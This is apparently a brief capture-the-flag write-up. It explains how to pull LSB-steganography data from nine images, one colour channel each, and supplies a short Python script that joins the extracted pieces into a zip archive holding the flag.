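Look at it in stegsolve: it is LSB steganography, and each image uses the whole channel matching its colour, e.g. the first one is all of red. Extract from all nine images, concatenate the pieces into one archive, and open it to get the flag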
import os


def merge_to_zip():
    # Pick the files named 1..9 and concatenate them in numeric order
    files = [f for f in os.listdir('.') if f.isdigit() and 1 <= int(f) <= 9]
    files.sort(key=lambda x: int(x))

    with open('output.zip', 'wb') as out:
        for fname in files:
            with open(fname, 'rb') as f:
                out.write(f.read())
            print(f"已拼接: {fname}")
    print("生成文件:output.zip")


if __name__ == '__main__':
    merge_to_zip()